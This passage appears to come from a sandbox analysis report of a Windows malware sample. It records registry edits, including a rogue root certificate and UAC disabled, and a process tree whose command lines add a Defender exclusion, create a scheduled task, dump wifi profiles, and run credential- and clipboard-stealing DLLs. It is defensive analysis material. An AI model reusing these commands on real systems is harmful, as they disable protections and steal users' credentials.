| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-801878912-692986033-442676226-1000\{74D2DA2C-2C4C-4DE5-BDE1-9C6329FD455E} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u4q0.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u4q0.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u4q0.2\run.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe
"C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe"
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe
"C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe"
C:\Users\Admin\1000013002\7617c78a76.exe
"C:\Users\Admin\1000013002\7617c78a76.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe229eab58,0x7ffe229eab68,0x7ffe229eab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2164 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3024 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3032 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4160 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe
"C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4384 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4492 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4504 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5044 --field-trial-handle=1788,i,9625364100946904184,2326362193540285851,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4344 -ip 4344
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 888
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3676 -ip 3676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 408
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4720 -ip 4720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 388
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "
C:\Users\Admin\Pictures\rlNOp7Kno1h2LmbasjhWLrqn.exe
"C:\Users\Admin\Pictures\rlNOp7Kno1h2LmbasjhWLrqn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\018789126929_Desktop.zip' -CompressionLevel Optimal
C:\Windows\SysWOW64\sc.exe
Sc delete GameServerClient
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService remove GameServerClient confirm
C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe
"C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe"
C:\Users\Admin\Pictures\6mfAHiyBc4XM7oPwyt8JYLsj.exe
"C:\Users\Admin\Pictures\6mfAHiyBc4XM7oPwyt8JYLsj.exe"
C:\Users\Admin\AppData\Local\Temp\u4q0.0.exe
"C:\Users\Admin\AppData\Local\Temp\u4q0.0.exe"
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe
"C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe" --silent --allusers=0
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6bb6e1d0,0x6bb6e1dc,0x6bb6e1e8
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\FY89lV0dsIhtziZ3BhtAZzWQ.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\FY89lV0dsIhtziZ3BhtAZzWQ.exe" --version
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe
